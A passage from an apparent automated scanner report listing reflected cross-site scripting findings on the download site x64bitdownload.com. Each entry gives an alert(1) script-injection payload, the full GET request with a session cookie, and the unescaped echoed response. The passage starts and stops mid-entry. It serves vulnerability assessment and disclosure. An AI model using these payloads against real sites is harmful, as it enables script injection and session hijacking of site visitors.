
HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/2a650"><script>alert(1)</script>4eac85a3ec4" />
...[SNIP]...

4.1830. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f05"><script>alert(1)</script>fc2166241bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

4.1831. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b00c"><script>alert(1)</script>9b9d0e5a949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949" />
...[SNIP]...

4.1832. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be78"><script>alert(1)</script>474c7483424 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html" />
...[SNIP]...

4.1833. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38eaf"><script>alert(1)</script>7f5c302d424 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/38eaf"><script>alert(1)</script>7f5c302d424 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/38eaf"><script>alert(1)</script>7f5c302d424" />
...[SNIP]...

4.1834. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38c6"><script>alert(1)</script>235a4421e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

4.1835. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a72"><script>alert(1)</script>406b3b0c339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/71a72"><script>alert(1)</script>406b3b0c339 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/71a72"><script>alert(1)</script>406b3b0c339" />
...[SNIP]...

4.1836. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d9b"><script>alert(1)</script>2df60bcd894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html" />
...[SNIP]...

4.1837. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d23"><script>alert(1)</script>db205ea7bef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e7d23"><script>alert(1)</script>db205ea7bef HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/e7d23"><script>alert(1)</script>db205ea7bef" />
...[SNIP]...

4.1838. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da589"><script>alert(1)</script>1e658102b94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

4.1839. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae28f"><script>alert(1)</script>c6d61f2298f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/ae28f"><script>alert(1)</script>c6d61f2298f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/ae28f"><script>alert(1)</script>c6d61f2298f" />
...[SNIP]...

4.1840. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e7"><script>alert(1)</script>f2581632af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

4.1841. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f2b"><script>alert(1)</script>da38c854bdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e4f2b"><script>alert(1)</script>da38c854bdf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/e4f2b"><script>alert(1)</script>da38c854bdf" />
...[SNIP]...

4.1842. http://www.x64bitdownload.com/software-advanced.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1990"><script>alert(1)</script>2069cb8ec45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45" />
...[SNIP]...

4.1843. http://www.x64bitdownload.com/software-advanced.html [category_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The value of the category_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9983e"><script>alert(1)</script>7a9a68e5cfe was submitted in the category_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d" />
...[SNIP]...

4.1844. http://www.x64bitdownload.com/software-advanced.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90432"><script>alert(1)</script>6a90f02313b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1" />
...[SNIP]...

4.1845. http://www.x64bitdownload.com/software-advanced.html [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3de"><script>alert(1)</script>2b0419dd3c8 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8" />
...[SNIP]...

4.1846. http://www.x64bitdownload.com/software-advanced.html [subcategory_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The value of the subcategory_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f24a6"><script>alert(1)</script>bc5aeab94eb was submitted in the subcategory_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d" />
...[SNIP]...

4.1847. http://www.x64bitdownload.com/submit-pad-file.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /submit-pad-file.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8c4"><script>alert(1)</script>c00cfdcf2d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9" />
...[SNIP]...

4.1848. http://www.x64bitdownload.com/submit-pad-file.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /submit-pad-file.html

Issue detail

